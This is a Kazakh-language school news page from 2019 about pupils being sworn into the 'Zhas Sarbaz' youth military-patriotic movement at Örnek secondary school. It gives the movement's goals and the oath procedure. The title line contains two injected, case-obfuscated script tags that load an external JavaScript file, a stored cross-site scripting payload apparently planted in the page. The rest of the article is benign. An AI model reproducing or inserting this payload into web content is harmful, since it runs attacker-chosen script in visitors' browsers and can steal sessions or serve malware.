«Жас сарбаз» жасөспірімдер әскери-патриоттық қозғалысы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
09.10.2019
2019 жылдың 9-қазанында Өрнек орта мектебінде «Жас сарбаз» жасөспірімдер әскери-патриоттық қозғалысы қатарына қабылдау өткізілді. «Жас сарбаз» жасөспірімдер әскери-патриоттық қозғалысы қатарына қабылдау жыл сайын өткізіледі және әскери-патриоттық тәрбие жүйесіндегі жұмыстың бастауы болып табылады.
Бұл мектептегі әскери-патриоттық қозғалыстың жақсаруына, азаматтық және патриотизмнің әлеуметтік маңызды құндылықтарының қалыптасуы мен дамуына ықпал етеді.
- Өскелең ұрпақты жоғары азаматтық белсенділікке, патриотизмге, кереғар идеаларға қарсы тұруға тәрбиелеу
- Әскери қызметке шақыру жасына дейінгі жастардың Отан қорғауға және әскери қызметке деген оң уәждемесін дамытуды қамтамасыз етуге қабілетті бірыңғай мамандандырылған оқу-тәрбие процесін қалыптастыру.
Ант қабылдау бұйрық бойынша жүзеге асырылды. Оқушылар кезекпен саптың ортасына өтіп, анттың мәтінін оқып, аты-жөндері жазылған тізімге қол қойды. Ант қабылдауға АӘД пәнінің мұғалімі Аюпов Т.З шақырды.
Просмотров: 954